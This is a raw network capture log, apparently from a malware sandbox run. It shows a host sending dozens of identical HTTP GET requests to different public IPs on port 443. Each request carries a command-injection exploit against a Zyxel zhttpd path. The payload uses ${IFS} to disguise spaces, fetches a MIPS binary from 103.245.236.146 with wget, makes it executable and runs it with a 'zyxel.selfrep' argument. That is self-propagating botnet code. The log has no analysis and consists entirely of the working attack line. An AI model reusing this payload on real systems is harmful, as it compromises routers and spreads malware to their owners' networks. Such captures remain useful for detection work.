                                                Jan 28, 2024 10:16:23.783766985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4032192.168.2.2338662196.92.104.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783822060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4033192.168.2.234049093.96.27.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783843994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4034192.168.2.2351078149.171.229.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783869982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4035192.168.2.2351744187.232.221.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783890963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4036192.168.2.2349060177.206.95.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783926964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4037192.168.2.233808236.191.32.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783943892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4038192.168.2.2351490194.190.172.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783945084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4039192.168.2.2339602139.62.174.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783963919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4040192.168.2.233325899.229.164.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783979893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4041192.168.2.234975219.87.202.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.783992052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4042192.168.2.2359856208.195.193.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784038067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4043192.168.2.235987048.70.156.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784054995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4044192.168.2.234398299.173.246.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784079075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4045192.168.2.2355470101.75.193.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784112930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4046192.168.2.234204667.197.193.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784137011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4047192.168.2.234469231.27.41.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784153938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4048192.168.2.2338660212.226.126.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784199953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4049192.168.2.2333410149.132.225.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784236908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4050192.168.2.2345904105.226.192.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784255981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4051192.168.2.2352754138.106.14.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784293890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4052192.168.2.2341368102.72.113.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784313917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4053192.168.2.2340922108.24.200.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784343958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4054192.168.2.2332880139.155.20.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784399033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4055192.168.2.235341094.68.195.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784400940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4056192.168.2.23432529.20.37.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784434080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4057192.168.2.2356094221.67.58.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784435987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4058192.168.2.2332952112.35.215.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784472942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4059192.168.2.2333896193.125.25.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784511089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4060192.168.2.236090072.119.61.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784524918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4061192.168.2.235803018.200.186.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784533978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4062192.168.2.2344652166.45.10.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784550905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4063192.168.2.233788288.91.195.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784593105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4064192.168.2.2342704142.151.204.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784638882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4065192.168.2.234703261.35.90.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784660101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4066192.168.2.234146813.119.211.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784688950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4067192.168.2.2340474130.175.145.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784697056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4068192.168.2.235529624.196.233.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784729958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4069192.168.2.2345916135.98.45.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784743071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4070192.168.2.235961695.77.160.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784759045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4071192.168.2.235362296.47.164.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784779072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4072192.168.2.235069090.143.209.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784840107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4073192.168.2.235383619.240.0.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784852982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4074192.168.2.2344446116.10.139.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784858942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4075192.168.2.2336628121.188.87.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784876108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4076192.168.2.233506259.68.77.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784887075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4077192.168.2.2353190144.209.187.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784910917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4078192.168.2.2333530185.50.80.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.784969091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4079192.168.2.235330060.25.217.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785001040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4080192.168.2.234719660.82.127.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785011053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4081192.168.2.233441447.250.29.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785041094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4082192.168.2.2337760180.107.135.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785075903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4083192.168.2.2352858190.232.5.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785084963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4084192.168.2.2349644170.66.44.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785121918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4085192.168.2.2356322157.126.186.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785129070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4086192.168.2.235690039.109.20.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785157919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4087192.168.2.2350328149.104.246.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785187960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4088192.168.2.2343020184.178.56.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785213947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4089192.168.2.2357932112.65.135.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785248995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4090192.168.2.234008094.52.65.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785265923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4091192.168.2.2347640197.164.120.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785305023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4092192.168.2.234912691.233.119.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785331011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4093192.168.2.2356674195.157.77.162443
                                                TimestampBytes transferredDirectionData
